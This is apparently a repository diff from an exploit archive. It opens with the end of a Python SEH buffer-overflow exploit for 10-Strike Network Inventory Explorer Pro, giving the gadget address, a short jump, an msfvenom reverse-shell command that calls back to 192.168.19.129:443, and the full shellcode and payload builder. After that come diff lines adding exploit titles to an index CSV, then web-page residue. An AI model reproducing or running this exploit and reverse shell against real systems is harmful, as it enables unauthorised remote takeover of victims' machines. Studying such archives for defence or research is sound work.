Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
|
||||
"""
|
||||
|
||||
pop_pop_ret = struct.pack("<I", 0x01015af4)
|
||||
|
||||
short_jump = '\xEB\x06\x90\x90'
|
||||
|
||||
"""
|
||||
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.129 LPORT=443 -f python -v shellcode -b "\x00\x09\x0a\x0d\x3a\x5c" EXITFUNC=thread
|
||||
"""
|
||||
shellcode = ""
|
||||
shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
|
||||
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
|
||||
shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
|
||||
shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
|
||||
shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
|
||||
shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
|
||||
shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
|
||||
shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
|
||||
shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
|
||||
shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
|
||||
shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
|
||||
shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
|
||||
shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
|
||||
shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
|
||||
shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
|
||||
shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
|
||||
shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
|
||||
shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
|
||||
shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
|
||||
shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
|
||||
shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
|
||||
shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
|
||||
shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
|
||||
shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
|
||||
shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
|
||||
shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
|
||||
shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
|
||||
shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
|
||||
shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
|
||||
shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
|
||||
shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
|
||||
shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"
|
||||
|
||||
payload = 'A' * (OFFSET - len(short_jump))
|
||||
payload += short_jump
|
||||
payload += pop_pop_ret
|
||||
payload += '\x90' * 8
|
||||
payload += shellcode
|
||||
|
||||
f = open("exploit.txt", "w")
|
||||
f.write(payload)
|
||||
f.close()
|
|
@ -11232,6 +11232,7 @@ id,file,description,date,author,type,platform,port
|
|||
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
|
||||
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
|
||||
49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
|
||||
49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -43524,3 +43525,13 @@ id,file,description,date,author,type,platform,port
|
|||
49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
|
||||
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
|
||||
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
|
||||
49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
|
||||
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
|
||||
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
|
||||
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
|
||||
49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
|
||||
49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php,
|
||||
49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux,
|
||||
49319,exploits/php/webapps/49319.txt,"Artworks Gallery Management System 1.0 - 'id' SQL Injection",2020-12-22,"Vijay Sachdeva",webapps,php,
|
||||
49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,
|
||||
49321,exploits/linux/webapps/49321.py,"TerraMaster TOS 4.2.06 - RCE (Unauthenticated)",2020-12-22,IHTeam,webapps,linux,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue